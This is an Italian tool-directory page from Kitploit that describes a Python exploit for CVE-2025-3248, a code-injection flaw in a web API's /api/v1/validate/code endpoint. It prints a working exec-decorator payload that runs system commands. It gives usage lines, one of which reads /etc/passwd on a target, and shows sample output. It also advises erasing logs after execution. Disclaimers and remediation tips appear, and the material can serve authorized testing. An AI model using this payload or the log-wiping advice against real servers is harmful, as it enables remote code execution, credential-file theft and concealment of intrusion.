Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3248 — Exploit basato su Python per CVE-2025-3248, una vulnerabilità di code injection in un'API web. Esegue comandi di sistema arbitrari tramite payload appositamente creati per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/12-test-12/cve-2025-3248
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHub12-test-12/cve-2025-3248

CVE-2025-3248

Exploit basato su Python per CVE-2025-3248, una vulnerabilità di code injection in un'API web. Esegue comandi di sistema arbitrari tramite payload appositamente creati per test di penetrazione autorizzati.

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Documentazione dello strumento di exploit per CVE-2025-3248

Introduzione

Questo strumento viene utilizzato per sfruttare la vulnerabilità CVE-2025-3248 (una vulnerabilità di injection di codice Python), costruendo un payload malevolo per ottenere l'esecuzione remota di comandi (RCE) sul server target. La vulnerabilità risiede in un'interfaccia API di una web application; un attaccante può sfruttare un punto di esecuzione di codice non verificato per iniettare codice Python arbitrario.

Avviso importante: Questo strumento è destinato solo a test di sicurezza autorizzati. Test di penetrazione non autorizzati potrebbero violare la legge. Assicurati di avere un'autorizzazione esplicita per il sistema target.

Caratteristiche

  • ✅ Iniettare codice Python malevolo tramite l'endpoint /api/v1/validate/code
  • ✅ Supporto per l'esecuzione di comandi di sistema arbitrari (es. whoami, ls, ecc.)
  • ✅ Timeout personalizzabile (default 10 secondi)
  • ✅ Supporto per due formati di output: testo e JSON
  • ✅ Gestione dettagliata degli errori e output di log

Utilizzo

Sintassi di base

root@kitploit:~

编辑


python cve-2025-3248.py -t <URL_target> -c "<comando>" [opzioni]

Descrizione dei parametri

Esempi di utilizzo

Esempio 1: Eseguire il comando whoami (formato di output predefinito)

root@kitploit:~

编辑


python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"

Esempio di output:

root@kitploit:~

[+] Comando eseguito con successo
--------------------------------------------------
www-data
--------------------------------------------------

Esempio 2: Output in formato JSON + log dettagliati

root@kitploit:~

编辑


python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v

Esempio di output:

root@kitploit:~

{
  "status": 200,
  "content": "root:x:0:0:root:/root:/bin/bash\n...",
  "success": true
}

Analisi del principio della vulnerabilità

  • Il servizio target riceve il parametro code nell'endpoint /api/v1/validate/code
  • Il server non filtra l'input in modo sicuro e utilizza direttamente exec() per eseguire il codice Python passato
  • L'attaccante costruisce un payload speciale:
root@kitploit:~

import os
@exec("raise Exception(os.popen('whoami').read())")
def f():
    pass
  • Attraverso il meccanismo di gestione delle eccezioni, attiva os.popen() per eseguire comandi di sistema
  • Rischio della vulnerabilità: questa vulnerabilità può portare al controllo completo del server; un attaccante può eseguire comandi di sistema arbitrari, rubare dati sensibili, installare backdoor, ecc.

Avviso di sicurezza

⚠️ Questo strumento è solo per test di penetrazione autorizzati ⚠️

  • Rischio legale: l'uso di questo strumento per test di penetrazione senza autorizzazione esplicita può violare leggi come il Computer Fraud and Abuse Act e altre normative.
  • Rischio di sistema: l'esecuzione di comandi di sistema può causare crash del servizio, perdita di dati o downtime del sistema.
  • Rischio di rilevamento: le attività di attacco possono essere rilevate e registrate da firewall, IDS/IPS.

Raccomandazioni:

  • Utilizzare solo in ambienti controllati (es. laboratori, ambienti di test autorizzati)
  • Dare priorità all'uso del parametro -v per visualizzare log dettagliati ed evitare errori operativi
  • Pulire immediatamente le tracce dopo l'esecuzione (es. cancellare i log, chiudere le sessioni)

Dipendenze

  • Python 3.7+
  • Libreria requests (da installare preventivamente)
root@kitploit:~

编辑


pip install requests

Spiegazione della gestione degli errori

Dettagli tecnici

  • Posizione della vulnerabilità: endpoint POST /api/v1/validate/code
  • Tipo di vulnerabilità: Code Injection
  • Versioni interessate: non specificato (lo script presuppone versioni con la vulnerabilità)
  • Raccomandazioni di remediation:
    • Filtrare rigorosamente l'input (vietare funzioni come exec/eval)
    • Utilizzare un ambiente sandbox per eseguire il codice utente
    • Limitare i permessi degli endpoint API

Disclaimer

Questo documento è solo per scopi di ricerca sulla sicurezza e formazione. L'autore non si assume alcuna responsabilità per danni diretti o indiretti derivanti dall'uso di questo strumento. Si prega di rispettare le leggi e i regolamenti, utilizzando gli strumenti di sicurezza in modo legale.

Scarica lo strumento
ParametroObbligatorioDescrizione
-t, --targetSìURL target (formato: http://ip:port)
-c, --commandSìComando di sistema da eseguire (da racchiudere tra virgolette)
-o, --outputNoFormato di output (text/json, default text)
--timeoutNoTimeout della richiesta (secondi, default 10)
-v, --verboseNoMostra log di esecuzione dettagliati
Codice erroreCausaSoluzione
[-] Errore formato URL targetURL mancante di scheme o hostControllare il formato dell'URL (es. http://127.0.0.1:8080)
[-] Timeout richiestaLa risposta del target ha superato il timeoutAumentare il valore del parametro --timeout
[-] Errore di connessioneTarget non raggiungibile/blocco firewallVerificare la connettività di rete
[-] Esecuzione comando fallita Codice HTTP: 403Rifiuto di autorizzazione del serverConfermare che il servizio target permetta l'esecuzione di codice